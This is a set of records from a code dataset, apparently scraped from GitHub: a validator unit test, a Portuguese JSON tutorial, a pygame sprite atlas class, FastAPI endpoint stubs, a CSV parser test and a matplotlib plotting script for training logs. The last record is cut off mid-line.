71, "usage_type": "call"}, {"api_name": "auth.requires_auth", "line_number": 54, "usage_type": "call"}, {"api_name": "models.Planets.query.filter_by", "line_number": 82, "usage_type": "call"}, {"api_name": "models.Planets.query", "line_number": 82, "usage_type": "attribute"}, {"api_name": "models.Planets", "line_number": 82, "usage_type": "name"}, {"api_name": "flask.abort", "line_number": 88, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 90, "usage_type": "call"}, {"api_name": "auth.requires_auth", "line_number": 78, "usage_type": "call"}, {"api_name": "models.Planets.query.filter_by", "line_number": 98, "usage_type": "call"}, {"api_name": "models.Planets.query", "line_number": 98, "usage_type": "attribute"}, 
{"api_name": "models.Planets", "line_number": 98, "usage_type": "name"}, {"api_name": "flask.request.get_json", "line_number": 100, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 100, "usage_type": "name"}, {"api_name": "flask.request.get_json", "line_number": 101, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 101, "usage_type": "name"}, {"api_name": "flask.abort", "line_number": 109, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 111, "usage_type": "call"}, {"api_name": "auth.requires_auth", "line_number": 95, "usage_type": "call"}, {"api_name": "models.Stars.query.all", "line_number": 122, "usage_type": "call"}, {"api_name": "models.Stars.query", "line_number": 122, "usage_type": "attribute"}, {"api_name": "models.Stars", "line_number": 122, "usage_type": "name"}, {"api_name": "flask.abort", "line_number": 134, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 136, "usage_type": "call"}, {"api_name": "auth.requires_auth", "line_number": 118, "usage_type": "call"}, {"api_name": "flask.request.get_json", "line_number": 144, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 144, "usage_type": "name"}, {"api_name": "flask.request.get_json", "line_number": 145, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 145, "usage_type": "name"}, {"api_name": "models.Stars", "line_number": 146, "usage_type": "call"}, {"api_name": "flask.abort", "line_number": 155, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 157, "usage_type": "call"}, {"api_name": "auth.requires_auth", "line_number": 140, "usage_type": "call"}, {"api_name": "models.Stars.query.filter_by", "line_number": 167, "usage_type": "call"}, {"api_name": "models.Stars.query", "line_number": 167, "usage_type": "attribute"}, {"api_name": "models.Stars", "line_number": 167, "usage_type": "name"}, {"api_name": "flask.abort", "line_number": 174, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 176, "usage_type": "call"}, {"api_name": "auth.requires_auth", "line_number": 164, "usage_type": "call"}, {"api_name": "models.Stars.query.filter_by", "line_number": 185, "usage_type": "call"}, {"api_name": "models.Stars.query", "line_number": 185, "usage_type": "attribute"}, {"api_name": "models.Stars", "line_number": 185, "usage_type": "name"}, {"api_name": "flask.request.get_json", "line_number": 186, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 186, "usage_type": "name"}, {"api_name": "flask.request.get_json", "line_number": 187, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 187, "usage_type": "name"}, {"api_name": "flask.abort", "line_number": 195, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 197, "usage_type": "call"}, {"api_name": "auth.requires_auth", "line_number": 181, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 203, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 211, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 219, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 227, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 235, "usage_type": "call"}, {"api_name": "auth.AuthError", "line_number": 233, "usage_type": "argument"}]}
+{"seq_id": "13756007653", "text": "import unittest\nimport json\nfrom validators.greaterthan import Greaterthan\n\n\nclass GreaterthanTest(unittest.TestCase):\n\n def _load_test_data(self):\n self.validation = json.loads('{\"condition\": \"greaterthan\",\"value\": \"10\",\"type\": \"error\",\"message\": \"This field should be less than 11\"}')\n\n def test_is_greater_than(self):\n self._load_test_data()\n number = \"11\"\n validator = Greaterthan(self.validation)\n assert validator.is_valid(number) == False\n\n def test_is_less_than(self):\n self._load_test_data()\n number = \"2\"\n validator = Greaterthan(self.validation)\n assert validator.is_valid(number)\n\n def test_is_than_with_decimal(self):\n self._load_test_data()\n number = \"1.0\"\n validator = Greaterthan(self.validation)\n assert validator.is_valid(number)\n\nif __name__ == '__main__':\n unittest.main()\n", "repo_name": "ONSdigital/alpha-eq-survey-runner", "sub_path": "validators/greaterthan_test.py", "file_name": "greaterthan_test.py", "file_ext": "py", "file_size_in_byte": 899, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "unittest.TestCase", "line_number": 6, "usage_type": "attribute"}, {"api_name": "json.loads", "line_number": 9, "usage_type": "call"}, {"api_name": "validators.greaterthan.Greaterthan", "line_number": 14, "usage_type": "call"}, {"api_name": "validators.greaterthan.Greaterthan", "line_number": 20, "usage_type": "call"}, {"api_name": "validators.greaterthan.Greaterthan", "line_number": 26, "usage_type": "call"}, {"api_name": "unittest.main", "line_number": 30, "usage_type": "call"}]}
+{"seq_id": "42307662229", "text": "\"\"\"\nJson é basicamente uma estrutura de dados que foi criada para que você transporte\nou salve dados. \n\"\"\" \n\"\"\"\nDados que podem ter no Json são bolean, number(int ou float), null(nada), string,\narray (\"[]\") são como se fosse uma lista, e por fim um \"{}\" igual aos objetos(dictionary)\n\"\"\"\n\n\n#Exemplo1 de arquivo json :\n\n\"\"\"\n[\n {\"name\": \"Luiz\", \"lasName\": \"Miranda\", \"age\": \"22\"},\n {\"name\": \"Rafael\", \"lasName\": \"Alves\", \"age\": \"15\"},\n {\"name\": \"João\", \"lasName\": \"Henrique\", \"age\": \"16\"},\n {\"name\": \"Billy\", \"lasName\": \"Paul\", \"age\": \"16\"},\n {\"name\": \"Kayo\", \"lasName\": \"Gabriel\", \"age\": \"17\"}\n]\n\n\"\"\"\n\n# Exemplo2 de arquivo json :\n\n# {\n# \"name\": \"Luiz\", \n# \"lasName\": \"Miranda\", \n# \"age\": \"22\",\n# \"adresses\": [\n# {\"line1\": \"av. brasil\"},\n# {\"line2\": \"av. amapá\"}\n# ]\n# }\n\n\n\n\n\n\nimport json\nimport os\n\n\n# pessoas = [\n# {\n# \"nome\": 'maria',\n# \"sobrenome\": 'santos',\n# \"idade\": 25,\n# \"ativo\": False,\n# \"notas\": ['A', 'A+'],\n# \"telefones\": {\n# \"residencial\": \"00 0000-0000\",\n# \"celular\": \"00 0000-0000\",\n# }\n# },\n# {\n# \"nome\": 'Joana',\n# \"sobrenome\": 'Moreira',\n# \"idade\": 32,\n# \"ativo\": True,\n# \"notas\": ['B', 'A'],\n# \"telefones\": {\n# \"residencial\": \"00 0000-0000\",\n# \"celular\": \"00 0000-0000\",\n# }\n# }, \n# ]\n\n# BASE_DIR = os.path.dirname(__file__) # Criação do caminho completo do arquivo aonde está\n# SAVE_TO = os.path.join(BASE_DIR, 'arquivo-python.json') # Este seria o arquivo\n# # Irá ter o caminho (BASE_DIR) mais o nome do arquivo ^\n\n\n# with open(SAVE_TO, 'w') as file: # File é o nome do arquivo\n# json.dump(pessoas, file, indent=2) # salva o dictionary como json file.\n\n\n# print(json.dumps(pessoas, indent=2))\n\n\n# Carregar de fora para dentro o json___________________________________________________________\n\nBASE_DIR = os.path.dirname(__file__) \nJSON_FILE = os.path.join(BASE_DIR, 'arquivo-python.json') \n\n# with open(JSON_FILE, 'r') as file:\n# pessoas = json.load(file)\n \n# for pessoa in pessoas:\n# print(pessoa['nome'], pessoa['notas'])\n\n\n# with open(JSON_FILE, 'r') as file:\n# pessoas = json.load(file)\n# print(json.dumps(pessoas)) # Converte ele em dumps e o printa.\n\n\njson_string = '''\n[{\"nome\": \"maria\", \"sobrenome\": \"santos\", \"idade\": 25, \"ativo\": false, \"notas\": [\"A\", \"A+\"], \"telefones\": {\"residencial\": \"00 0000-0000\", \"celular\": \"00 0000-0000\"}}, {\"nome\": \"Joana\", \"sobrenome\": \"Moreira\", \"idade\": 32, \"ativo\": true, \"notas\": [\"B\", \"A\"], \"telefones\": {\"residencial\": \"00 0000-0000\", \"celular\": \"00 0000-0000\"}}]\n''' # aqui foi usado para pegar a string\n\npessoas = json.loads(json_string) # Carrega as \"pessoas\" em formato de string\n # ele lê isto, entende, e converte em uma lista python.\n\nfor pessoa in pessoas:\n print(pessoa['nome'])\n# faz o for na lista e pega os dados de voltas\n\n\"\"\"\n load = carrega um arquivo.\n dump = joga para fora.\n json.dump = O dump normal, em um arquivo.\n json.dumps = Seria o dump de uma string, fazendo dump em uma string.\n ident = Formata a string\n\"\"\"", "repo_name": "CidineiPuto/aulaDePython", "sub_path": "aula123.py", "file_name": "aula123.py", "file_ext": "py", "file_size_in_byte": 3124, "program_lang": "python", "lang": "pt", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "os.path.dirname", 
"line_number": 84, "usage_type": "call"}, {"api_name": "os.path", "line_number": 84, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 85, "usage_type": "call"}, {"api_name": "os.path", "line_number": 85, "usage_type": "attribute"}, {"api_name": "json.loads", "line_number": 103, "usage_type": "call"}]}
+{"seq_id": "40083120995", "text": "import os\nimport copy\nimport pygame\nfrom animation import Animation\nfrom animation import StaticAnimation\nfrom entities.gui.sliced_image import SlicedImage\nimport config\n\n# if rescale is not a factor of 2, sprites will have fuzzy edges that will look terrible with color keying\nassert config.rescale_factor % 2 == 0, \"factor must be a multiple of 2\"\nassert isinstance(config.rescale_factor, int), \"factor must be an int value\"\n\n\nclass SpriteAtlasError(Exception):\n def __init__(self, name):\n super().__init__()\n self.name = name\n\n\nclass SpriteNotFoundError(SpriteAtlasError):\n def __init__(self, sprite_name):\n super().__init__(sprite_name)\n\n\nclass InvalidDimensionsError(SpriteAtlasError):\n def __init__(self, name, rect, wh):\n super().__init__(name)\n self.rect = rect\n self.dimensions = wh\n\n\nclass SpriteAtlas:\n \"\"\"An atlas is a grouped set of surfaces. By itself, it doesn't do much\n more than read the main surface into memory along with a txt file that describes\n the surfaces contained within the atlas. This information can be used to create\n specific Animation instances for later use by calling appropriate methods on the atlas\"\"\"\n def __init__(self, atlas_path=None, tf_use_rescale_factor=True, convert=True):\n # use the descriptor file to load subsurfaces\n self.sprite_rects = {}\n\n if atlas_path is not None and len(atlas_path) > 0:\n # locate atlas descriptor\n basename = os.path.splitext(atlas_path)[0]\n atlas_descriptor = basename + '.txt'\n\n if not os.path.exists(atlas_descriptor) or not os.path.exists(atlas_path):\n raise FileNotFoundError(atlas_descriptor)\n\n self.atlas = pygame.image.load(atlas_path)\n\n if not self.atlas:\n raise FileNotFoundError(atlas_path)\n\n if tf_use_rescale_factor:\n # apply rescaling\n # rescale without resampling\n scaled_size = (self.atlas.get_width() * config.rescale_factor,\n self.atlas.get_height() * config.rescale_factor)\n\n self.atlas = self.atlas \\\n if config.rescale_factor == 1 else pygame.transform.scale(self.atlas, scaled_size)\n\n self.rescale_factor = config.rescale_factor\n else:\n self.rescale_factor = 1\n\n file = open(atlas_descriptor, 'r')\n\n if not file:\n raise FileNotFoundError(atlas_descriptor)\n\n for line in file:\n # of the form: name = left top width height\n name, rect_str = [s.strip() for s in line.split('=')]\n rect = self._get_rect_from_str(rect_str)\n\n # apply rescale factor\n rect.x *= self.rescale_factor\n rect.y *= self.rescale_factor\n rect.width *= self.rescale_factor\n rect.height *= self.rescale_factor\n\n # add sprite to dictionary\n self.sprite_rects[name] = rect\n else:\n self.__sprite_rects = {}\n self.atlas = None\n\n self.animations = {}\n self.statics = {} # statics aren't initialized to anything by default so user can specify color key if wanted\n self.sliced = {}\n\n if convert and self.atlas is not None:\n self.atlas = self.atlas.convert()\n\n @property\n def sprite_names(self):\n return list(self.sprite_rects.keys())\n\n def initialize_animation(self, name, frame_width, frame_height, duration, color_key=None):\n if name in self.animations:\n return self.animations[name]\n\n # grab rect for this name\n if name not in self.sprite_rects:\n raise SpriteNotFoundError(name)\n\n rect = self.sprite_rects[name]\n\n frame_height = frame_height or frame_width\n\n if rect.width % frame_width != 0 or rect.height % frame_height != 0:\n raise InvalidDimensionsError(name, rect, (frame_width, frame_height))\n\n frames = [self.atlas.subsurface(\n 
pygame.Rect(x, y, frame_width, frame_height))\n for y in range(rect.y, rect.y + rect.height, frame_height)\n for x in range(rect.x, rect.x + rect.width, frame_width)]\n\n if color_key is not None:\n # cannot use per-pixel alpha values in this case\n converted = [s.convert() for s in frames]\n frames = converted\n\n for f in frames:\n f.set_colorkey(color_key)\n\n animation = Animation(frames, duration)\n\n self.animations[name] = animation\n\n def initialize_static(self, name, color_key=None, override_width=None, override_height=None):\n rect = self._fetch(name, self.sprite_rects)\n\n if override_width or override_height:\n rect = rect.copy() # don't affect original dimensions\n\n rect.width = override_width or rect.width\n rect.height = override_height or rect.height\n\n assert 0 <= rect.width <= self.atlas.get_width(), \"width out of range\"\n assert 0 <= rect.height <= self.atlas.get_height(), \"height out of range\"\n\n assert 0 <= rect.x <= self.atlas.get_width() - rect.width, \"x position out of range\"\n assert 0 <= rect.y <= self.atlas.get_height() - rect.height, \"y position out of range\"\n\n surf = self.atlas.subsurface(rect)\n\n if color_key is not None:\n surf = surf.convert()\n surf.set_colorkey(color_key)\n\n self.statics[name] = StaticAnimation(surf)\n\n def initialize_static_from_surface(self, name, surf):\n self.statics[name] = StaticAnimation(surf)\n\n def initialize_animation_from_frames(self, name, frames, duration):\n assert len(frames) > 0\n\n self.animations[name] = Animation(frames, duration)\n\n def initialize_slice_from_surface(self, name, surf, dims):\n self.sliced[name] = SlicedImage(surf, dims)\n\n def initialize_slice(self, name, slice_size, color_key=None):\n assert len(slice_size) == 2\n\n if name not in self.sprite_rects:\n raise SpriteNotFoundError(name)\n\n # todo: check for double-initialization?\n\n rect = self.sprite_rects[name]\n slice_img = self.atlas.subsurface(rect)\n\n # this surface must be at LEAST 24 bit or else scaling will fail\n if slice_img.get_bitsize() < 24:\n slice_img = slice_img.convert(24)\n\n if color_key is not None:\n slice_img = slice_img.convert()\n assert slice_img.get_bitsize() >= 24 # just to catch unexpected edge cases\n\n slice_img.set_colorkey(color_key)\n\n self.sliced[name] = SlicedImage(slice_img, slice_size)\n\n def load_static(self, name):\n return copy.copy(self._fetch(name, self.statics))\n\n def load_animation(self, name):\n return copy.copy(self._fetch(name, self.animations))\n\n def load_sliced(self, name):\n return copy.copy(self._fetch(name, self.sliced))\n\n def __add__(self, other):\n assert other is not self, \"adding atlas to itself makes no sense\"\n\n # create a new atlas that combines the two previous atlas\n # in this special case, we want shallow copies because it's likely the two atlases to be added\n # are about to be thrown away\n\n def get_names(an_atlas):\n sprite_names = set()\n\n for li in [an_atlas.sliced, an_atlas.statics, an_atlas.animations, an_atlas.sprite_rects]:\n for key_name in li.keys():\n sprite_names.add(key_name)\n\n return sprite_names\n\n # check for duplicate names and warn if any are found, because it may cause the atlas to choose\n # the wrong sprites\n intersections = get_names(self).intersection(get_names(other))\n\n for inter in intersections:\n print(f\"Warning! 
Two sprites named '{inter}' \"\n f\"in atlases to be combined; consider renaming one of the sprites\")\n\n new_atlas = SpriteAtlas()\n\n for new_d, our_d, other_d in [(new_atlas.sprite_rects, self.sprite_rects, other.sprite_rects),\n (new_atlas.statics, self.statics, other.statics),\n (new_atlas.animations, self.animations, other.animations),\n (new_atlas.sliced, self.sliced, other.sliced)]:\n new_d.update(our_d)\n new_d.update(other_d)\n\n return new_atlas\n\n def scale(self, new_size):\n if new_size is not tuple:\n new_size = (new_size, new_size)\n\n self.atlas = pygame.transform.scale(self.atlas, new_size)\n\n # modify all sprite rects\n old_rects = self.sprite_rects\n self.sprite_rects = {}\n\n # rather than come up with fancy logic to re-create all the sprites, or just to resize them (since that\n # will result in doubling memory use), just assume this will be an operation that happens before any\n # initializing of sprites and warn if it doesn't\n if len(self.statics) > 0 or len(self.animations) > 0 or len(self.sliced) > 0:\n print(\"Warning! Scaling an atlas will result in all initialized sprites being lost\")\n\n self.statics = {}\n self.animations = {}\n self.sliced = {}\n\n for name, rect in old_rects:\n nr = pygame.Rect(rect.x * new_size[0], rect.y * new_size[1],\n rect.width * new_size[0], rect.height * new_size[1])\n self.sprite_rects[name] = nr\n\n @staticmethod\n def _fetch(name, location):\n name = name.strip()\n\n if name not in location:\n print(\"could not find sprite '{}' in atlas\".format(name))\n raise SpriteNotFoundError(name)\n return location[name]\n\n @staticmethod\n def _get_rect_from_str(rect_str):\n r = pygame.Rect(0, 0, 0, 0)\n\n r.left, r.top, r.width, r.height = [int(x) for x in rect_str.split(' ')]\n\n return r\n", "repo_name": "amrazek/386-super-mario", "sub_path": "assets/sprite_atlas.py", "file_name": "sprite_atlas.py", "file_ext": "py", "file_size_in_byte": 10013, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "config.rescale_factor", "line_number": 10, "usage_type": "attribute"}, {"api_name": "config.rescale_factor", "line_number": 11, "usage_type": "attribute"}, {"api_name": "os.path.splitext", "line_number": 43, "usage_type": "call"}, {"api_name": "os.path", "line_number": 43, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 46, "usage_type": "call"}, {"api_name": "os.path", "line_number": 46, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 49, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 49, "usage_type": "attribute"}, {"api_name": "config.rescale_factor", "line_number": 57, "usage_type": "attribute"}, {"api_name": "config.rescale_factor", "line_number": 58, "usage_type": "attribute"}, {"api_name": "config.rescale_factor", "line_number": 61, "usage_type": "attribute"}, {"api_name": "pygame.transform.scale", "line_number": 61, "usage_type": "call"}, {"api_name": "pygame.transform", "line_number": 61, "usage_type": "attribute"}, {"api_name": "config.rescale_factor", "line_number": 63, "usage_type": "attribute"}, {"api_name": "pygame.Rect", "line_number": 116, "usage_type": "call"}, {"api_name": "animation.Animation", "line_number": 128, "usage_type": "call"}, {"api_name": "animation.StaticAnimation", "line_number": 153, "usage_type": "call"}, {"api_name": "animation.StaticAnimation", "line_number": 156, "usage_type": "call"}, {"api_name": "animation.Animation", "line_number": 161, "usage_type": 
"call"}, {"api_name": "entities.gui.sliced_image.SlicedImage", "line_number": 164, "usage_type": "call"}, {"api_name": "entities.gui.sliced_image.SlicedImage", "line_number": 187, "usage_type": "call"}, {"api_name": "copy.copy", "line_number": 190, "usage_type": "call"}, {"api_name": "copy.copy", "line_number": 193, "usage_type": "call"}, {"api_name": "copy.copy", "line_number": 196, "usage_type": "call"}, {"api_name": "pygame.transform.scale", "line_number": 237, "usage_type": "call"}, {"api_name": "pygame.transform", "line_number": 237, "usage_type": "attribute"}, {"api_name": "pygame.Rect", "line_number": 254, "usage_type": "call"}, {"api_name": "pygame.Rect", "line_number": 269, "usage_type": "call"}]}
+{"seq_id": "16864835228", "text": "from typing import Any, List\nfrom unittest import result\n\nfrom fastapi import APIRouter, Depends, HTTPException, status\nfrom sqlalchemy.orm import Session\n\nfrom app import schemas\nfrom app import crud\n\nfrom app.api.dependencies import get_db\n\nrouter = APIRouter()\n\n\n@router.post(\"\",\n response_model=schemas.Message)\ndef refresh_job(\n db: Session = Depends(get_db), \n obj_in = schemas.job_search_service.RefreshJobRequest) -> Any:\n result = crud.job_search_service.refresh_job(db = db, obj_in = obj_in)\n return result\n\n\n@router.post(\"\",\n response_model=schemas.Message)\ndef update_failed(*,\n db: Session = Depends(get_db),\n obj_in: schemas.job_search_service.UpdateFailRequest) -> Any:\n result = crud.job_search_service.update_failed(db = db, obj_in = obj_in)\n return result\n\n\n@router.post(\"\",\n response_model=schemas.Message)\ndef create_metadata(*,\n db: Session = Depends(get_db),\n obj_in: schemas.job_search_service.CreateMetaDataRequest) -> Any:\n\n result = crud.job_search_service.create_metadata(db = db, obj_in = obj_in)\n return result", "repo_name": "prd-tai-nguyen/test", "sub_path": "app/api/v1/endpoints/job_search_service.py", "file_name": "job_search_service.py", "file_ext": "py", "file_size_in_byte": 1200, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "fastapi.APIRouter", "line_number": 12, "usage_type": "call"}, {"api_name": "sqlalchemy.orm.Session", "line_number": 18, "usage_type": "name"}, {"api_name": "fastapi.Depends", "line_number": 18, "usage_type": "call"}, {"api_name": "app.api.dependencies.get_db", "line_number": 18, "usage_type": "argument"}, {"api_name": "app.schemas.job_search_service", "line_number": 19, "usage_type": "attribute"}, {"api_name": "app.schemas", "line_number": 19, "usage_type": "name"}, {"api_name": "unittest.result", "line_number": 20, "usage_type": "name"}, {"api_name": "app.crud.job_search_service.refresh_job", "line_number": 20, "usage_type": "call"}, {"api_name": "app.crud.job_search_service", "line_number": 20, "usage_type": "attribute"}, {"api_name": "app.crud", "line_number": 20, "usage_type": "name"}, {"api_name": "unittest.result", "line_number": 21, "usage_type": "name"}, {"api_name": "app.schemas.Message", "line_number": 16, "usage_type": "attribute"}, {"api_name": "app.schemas", "line_number": 16, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 19, "usage_type": "name"}, {"api_name": "sqlalchemy.orm.Session", "line_number": 27, "usage_type": "name"}, {"api_name": "app.schemas.job_search_service", "line_number": 28, "usage_type": "attribute"}, {"api_name": "app.schemas", "line_number": 28, "usage_type": "name"}, {"api_name": "fastapi.Depends", "line_number": 27, "usage_type": "call"}, {"api_name": "app.api.dependencies.get_db", "line_number": 27, "usage_type": "argument"}, {"api_name": "unittest.result", "line_number": 29, "usage_type": "name"}, {"api_name": "app.crud.job_search_service.update_failed", "line_number": 29, "usage_type": "call"}, {"api_name": "app.crud.job_search_service", "line_number": 29, "usage_type": "attribute"}, {"api_name": "app.crud", "line_number": 29, "usage_type": "name"}, {"api_name": "unittest.result", "line_number": 30, "usage_type": "name"}, {"api_name": "app.schemas.Message", "line_number": 25, "usage_type": "attribute"}, {"api_name": "app.schemas", "line_number": 25, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 28, 
"usage_type": "name"}, {"api_name": "sqlalchemy.orm.Session", "line_number": 36, "usage_type": "name"}, {"api_name": "app.schemas.job_search_service", "line_number": 37, "usage_type": "attribute"}, {"api_name": "app.schemas", "line_number": 37, "usage_type": "name"}, {"api_name": "fastapi.Depends", "line_number": 36, "usage_type": "call"}, {"api_name": "app.api.dependencies.get_db", "line_number": 36, "usage_type": "argument"}, {"api_name": "unittest.result", "line_number": 39, "usage_type": "name"}, {"api_name": "app.crud.job_search_service.create_metadata", "line_number": 39, "usage_type": "call"}, {"api_name": "app.crud.job_search_service", "line_number": 39, "usage_type": "attribute"}, {"api_name": "app.crud", "line_number": 39, "usage_type": "name"}, {"api_name": "unittest.result", "line_number": 40, "usage_type": "name"}, {"api_name": "app.schemas.Message", "line_number": 34, "usage_type": "attribute"}, {"api_name": "app.schemas", "line_number": 34, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 37, "usage_type": "name"}]}
+{"seq_id": "9804263156", "text": "import csv\nimport unittest\n\nimport parse\n\nclass TestParse(unittest.TestCase):\n FILES = ['data/inputFile1.csv', 'data/inputFile2.csv', 'data/inputFile3.csv']\n\n def test_parse_row(self):\n for filename in self.FILES:\n with open(filename) as csv_file:\n reader = csv.reader(csv_file)\n for row in reader:\n if row[0]:\n parse.parse_row(row)\n\n def test_parse_csv(self):\n for filename in self.FILES:\n with open(filename) as csv_file:\n parse.parse_csv(csv_file)\n\n def test_idempotent(self):\n for filename in self.FILES:\n with open(filename) as csv_file:\n reader = csv.reader(csv_file)\n for row in reader:\n if row[0]:\n parsed = parse.parse_row(row)\n if isinstance(parsed, parse.HourOut):\n out_row = parsed.to_row()\n parsed2 = parse.parse_row(out_row)\n self.assertEqual(parsed, parsed2)\n\n\n\n\nif __name__ == '__main__':\n unittest.main()\n\n", "repo_name": "sean-purcell/oec2020", "sub_path": "parse_test.py", "file_name": "parse_test.py", "file_ext": "py", "file_size_in_byte": 1155, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "unittest.TestCase", "line_number": 6, "usage_type": "attribute"}, {"api_name": "csv.reader", "line_number": 12, "usage_type": "call"}, {"api_name": "parse.parse_row", "line_number": 15, "usage_type": "call"}, {"api_name": "parse.parse_csv", "line_number": 20, "usage_type": "call"}, {"api_name": "csv.reader", "line_number": 25, "usage_type": "call"}, {"api_name": "parse.parse_row", "line_number": 28, "usage_type": "call"}, {"api_name": "parse.HourOut", "line_number": 29, "usage_type": "attribute"}, {"api_name": "parse.parse_row", "line_number": 31, "usage_type": "call"}, {"api_name": "unittest.main", "line_number": 38, "usage_type": "call"}]}
+{"seq_id": "17129684663", "text": "import numpy as np \r\nimport h5py\r\nimport matplotlib.pyplot as plt \r\nimport argparse\r\nimport pandas as pd \r\nfrom scipy import signal \r\nimport seaborn as sns\r\nfrom IPython.core.debugger import Pdb\r\n\r\nEXPERT_MEAN = 9790.99989735\r\nEXPERT_STD = 1175.06649136\r\n\r\ndef moving_average(inp,window_size):\r\n\tfilt = np.ones((window_size))\r\n\tfilt = filt/len(filt)\r\n\tout = np.convolve(inp, filt, \"same\")\r\n\treturn out\r\n\r\ndef plot_log_file(filename, fields_to_plot, save_dir, use_moving_average, moving_average_window_size):\r\n\tf = h5py.File(filename,'r')\r\n\tlog = f['log']\r\n\tfield_names = [ \"iter\", \"trueret\", \"iret\", \"trueret_std\", \"ire_std\", \"dl\", \"pgrad\", \"rloss\", \"racc\", \"rgrad\"]\r\n\tplt.figure()\r\n\thandles=[]\r\n\tfor field in fields_to_plot:\r\n\t\tdata = [log[i][field] for i in range(log.shape[0])]\r\n\t\tif use_moving_average:\r\n\t\t\tdata = moving_average(data, window_size=moving_average_window_size)\r\n\t\ttmp, = plt.plot(data, label=field_names[field])\r\n\t\thandles.append(tmp)\r\n\ttmp, = plt.plot(EXPERT_STD*np.ones((1500,)), label=\"expert\")\r\n\thandles.append(tmp)\r\n\tplt.legend(handles=handles)\r\n\tplt.grid(True)\r\n\tplt.savefig(save_dir+filename.split('/')[-1][:-3]+'.png')\r\n\tplt.show()\r\n\r\ndef plot_log_file_fancy(filename, save_dir, use_moving_average, use_median_filtering, moving_average_window_size):\r\n\tf = h5py.File(filename,'r')\r\n\tlog = f['log']\r\n\tfield_names = [ \"iter\", \"trueret\", \"iret\", \"trueret_std\", \"ire_std\", \"dl\", \"pgrad\", \"rloss\", \"racc\", \"rgrad\"]\r\n\tfields_to_plot = [field_names[i] for i in [1,3]]\r\n\t\r\n\tmean = [log[i][1] for i in range(log.shape[0])]\r\n\tif use_moving_average:\r\n\t\tmean = moving_average(mean, window_size=moving_average_window_size)\r\n\telif use_median_filtering:\r\n\t\tmean = signal.medfilt(mean, window_size)\r\n\t\r\n\tstd = [log[i][3] for i in range(log.shape[0])]\r\n\tif use_moving_average:\r\n\t\tstd = moving_average(std, window_size=moving_average_window_size)\r\n\telif use_median_filtering:\r\n\t\tstd = signal.medfilt(std, window_size)\r\n\t\r\n\tplt.figure()\r\n\tplt.plot(mean)\r\n\tplt.fill_between(xrange(mean.shape[0]), [i+j for (i,j) in zip(mean,std)], [i-j for (i,j) in zip(mean,std)], facecolor='b', alpha=0.25)\r\n\tplt.grid(True)\r\n\tplt.savefig(save_dir+filename.split('/')[-1][:-3]+'_fancy.png')\r\n\tplt.show()\r\n\r\ndef plot_log_file_mean_with_raw(filename, save_dir, use_moving_average, use_median_filtering, moving_average_window_size):\r\n\tf = h5py.File(filename,'r')\r\n\tlog = f['log']\r\n\tfield_names = [ \"iter\", \"trueret\", \"iret\", \"trueret_std\", \"ire_std\", \"dl\", \"pgrad\", \"rloss\", \"racc\", \"rgrad\"]\r\n\tfields_to_plot = [field_names[i] for i in [1,3]]\r\n\t\r\n\tmean_raw = [log[i][1] for i in range(log.shape[0])]\r\n\tif use_moving_average:\r\n\t\tmean = moving_average(mean_raw, window_size=moving_average_window_size)\r\n\telif use_median_filtering:\r\n\t\tmean = signal.medfilt(mean_raw, window_size)\r\n\t\r\n\tstd_raw = [log[i][3] for i in range(log.shape[0])]\r\n\tif use_moving_average:\r\n\t\tstd = moving_average(std_raw, window_size=moving_average_window_size)\r\n\telif use_median_filtering:\r\n\t\tstd = signal.medfilt(std_raw, window_size)\r\n\t\r\n\tplt.figure()\r\n\tplt.plot(mean, color='g')\r\n\tplt.plot(mean_raw, color='g', alpha=0.3)\r\n\tplt.plot(std, color='b')\r\n\tplt.plot(std_raw, color='b', 
alpha=0.3)\r\n\tplt.grid(True)\r\n\tplt.savefig(save_dir+filename.split('/')[-1][:-3]+'_withRaw.png')\r\n\t# plt.show()\r\n\r\n\r\ndef compare_methods(filename1, filename2, fields_to_plot, save_dir, use_moving_average, use_median_filtering, window_size):\r\n\tf1 = h5py.File(filename1,'r')\r\n\tf2 = h5py.File(filename2,'r')\r\n\tlog1 = f1['log']\r\n\tlog2 = f2['log']\r\n\tfield_names = [ \"iter\", \"trueret\", \"iret\", \"trueret_std\", \"ire_std\", \"dl\", \"pgrad\", \"rloss\", \"racc\", \"rgrad\"]\r\n\tfor field in fields_to_plot:\r\n\t\tplt.figure()\r\n\t\thandles=[]\r\n\t\tdata1 = [log1[i][field] for i in range(log1.shape[0])]\r\n\t\tif use_moving_average:\r\n\t\t\tdata1 = moving_average(data1, window_size=window_size)\r\n\t\telif use_median_filtering:\r\n\t\t\tdata1 = signal.medfilt(data1, window_size)\r\n\t\ttmp, = plt.plot(data1, label=filename1.split('/')[-1])\r\n\t\thandles.append(tmp)\r\n\t\tdata2 = [log2[i][field] for i in range(log2.shape[0])]\r\n\t\tif use_moving_average:\r\n\t\t\tdata2 = moving_average(data2, 